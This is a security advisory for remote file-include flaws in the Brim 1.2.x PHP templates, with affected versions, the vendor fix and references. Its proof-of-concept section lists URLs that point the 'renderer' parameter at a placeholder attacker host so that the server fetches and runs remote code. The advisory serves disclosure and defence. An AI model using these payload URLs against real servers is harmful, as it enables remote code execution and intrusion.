Brim Multiple Remote File Include Vulnerabilities
BID:20594
Info
Brim Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20594 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 17 2006 12:00AM |
| Updated: | Dec 06 2006 10:34PM |
| Credit: | mdx and The_Bat_Hacker have been credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Brim Brim 1.2.1 Brim Brim 1.2 pre3 |
| Not Vulnerable: |
Brim Brim 1.2.2 |
Discussion
Brim Multiple Remote File Include Vulnerabilities
Brim is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Brim versions 1.2.0pre3 and 1.2.1 are vulnerable to these issues.
Brim is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Brim versions 1.2.0pre3 and 1.2.1 are vulnerable to these issues.
Exploit / POC
Brim Multiple Remote File Include Vulnerabilities
Attackers can exploit this issue with a web client.
The following proof-of-concept examples are available:
http://www.example.com/[path]/templates/barrel/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/sidebar/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/text-only/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/slashdot/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/penguin/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/pda/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/oerdec/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/nifty/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/mylook/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/barry/template.tpl.php?renderer=http://attacker_file
Attackers can exploit this issue with a web client.
The following proof-of-concept examples are available:
http://www.example.com/[path]/templates/barrel/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/sidebar/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/text-only/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/slashdot/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/penguin/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/pda/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/oerdec/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/nifty/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/mylook/template.tpl.php?renderer=http://attacker_file
http://www.example.com/[path]/templates/barry/template.tpl.php?renderer=http://attacker_file
Solution / Fix
Brim Multiple Remote File Include Vulnerabilities
Solution:
The vendor released an update to address this issue. Please see the references for more information.
Solution:
The vendor released an update to address this issue. Please see the references for more information.
References
Brim Multiple Remote File Include Vulnerabilities
References:
References:
- Brim Homepage (Brim)
- Brim renderer Remote File Include Vulnerability (mdx and The_Bat_Hacker)
- Brim Version 1.2.2 Release Notes (Brim)